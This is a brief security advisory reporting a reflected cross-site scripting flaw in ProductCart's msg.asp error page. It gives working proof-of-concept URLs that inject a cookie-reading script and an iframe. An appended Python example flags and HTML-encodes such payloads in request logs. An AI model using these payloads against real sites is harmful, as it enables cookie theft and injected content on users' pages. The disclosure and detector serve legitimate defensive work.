#####################
# ProductCart XSS   #
# Vulnerability     #
# found by atomix   #
#####################

I came across the fact that in an area of ProductCart you are able to
manipulate the error message, therefore allowing tags such as <script>
and <iframe> to be used:

http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert (document.cookie);</script>

http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%20width=400%20height=400></iframe>

-atomix | atom b0mbs
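
A defender's view of the issue described above, as an added example that is not part of the original advisory and not ProductCart's own code: Python that flags requests to msg.asp whose message parameter decodes to markup, and shows the HTML-encoded form a page should emit instead of the raw value. The function names and the sample request lines are constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Angle brackets have no place in a plain-text status message.
MARKUP = re.compile(r"[<>]")

def message_param(url):
    """Return the decoded 'message' values of a msg.asp request, else []."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/msg.asp"):
        return []
    return parse_qs(parts.query, keep_blank_values=True).get("message", [])

def is_suspicious(url):
    """True when the decoded message parameter contains tag delimiters."""
    return any(MARKUP.search(value) for value in message_param(url))

def render_safely(value):
    """HTML-encode the value so a browser shows it as text, not markup."""
    return html.escape(value, quote=True)

def flagged(requests):
    """Filter a list of request URLs down to the suspicious ones."""
    return [r for r in requests if is_suspicious(r)]

# Constructed sample requests (not real traffic).
SAMPLE_REQUESTS = [
    "/ProductCart/pc/msg.asp?message=Your+cart+is+empty",
    "/ProductCart/pc/msg.asp?message=%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "/ProductCart/pc/msg.asp?message=%3Ciframe%20src=%22x%22%3E%3C/iframe%3E",
    "/some/other/page.asp?message=%3Cb%3E",  # different page, out of scope
]

if __name__ == "__main__":
    for request in flagged(SAMPLE_REQUESTS):
        print("suspicious:", request)
        for value in message_param(request):
            print("  encoded :", render_safely(value))
```
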